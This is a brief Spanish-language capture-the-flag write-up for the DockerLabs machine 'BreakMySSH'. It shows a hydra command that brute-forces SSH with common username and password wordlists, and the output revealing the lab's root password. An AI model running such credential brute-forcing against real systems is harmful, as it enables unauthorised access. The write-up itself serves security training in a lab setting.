> For the complete documentation index, see [llms.txt](https://propus.gitbook.io/hackbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://propus.gitbook.io/hackbook/writeups/dockerlabs/breakmyssh.md).

# 🟦 BreakMySSH

Con un `nmap` vemos que solo está abierto el puerto de SSH. Por el nombre de la máquina me puedo imaginar que hay que hacerle fuerza bruta.

```bash
hydra -L /usr/share/wordlists/SecLists-2025.2/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt ssh://$IPTARGET
```

```bash
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2   login: root   password: estrella
```

<div align="left"><figure><img src="/files/TwMQbk6bQKvc3H0GW7Ll" alt=""><figcaption></figcaption></figure></div>
